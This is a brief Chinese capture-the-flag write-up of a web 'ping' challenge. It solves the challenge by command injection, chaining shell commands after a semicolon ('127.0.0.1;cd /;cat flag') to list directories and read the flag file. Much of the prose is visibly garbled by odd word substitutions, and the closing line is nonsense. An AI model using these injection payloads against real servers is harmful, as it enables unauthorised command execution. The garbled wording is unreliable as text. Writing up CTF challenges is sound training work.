文章目录
[+]
又是一个ping的题,预测远程命令实行。
payload:ping 127.0.0.1;ls
直接显示了index.php,要知道Linux系统显示网页的路径是/var/www/html

(图片来自网络侵删)
也便是说index.php在这个路径里,而且;分号又没有过滤
先返回根目录看看flag在不在:127.0.0.1;cd /;ls
还真在,而且空格,分号都没过滤。
末了的payload:127.0.0.1;cd /;cat flag
得到flag:flag{3b856f6e-4d48-48de-9dfc-bda37140b087}
3. 所需工具无
4. 写在末了本文完敬爱与来日诰日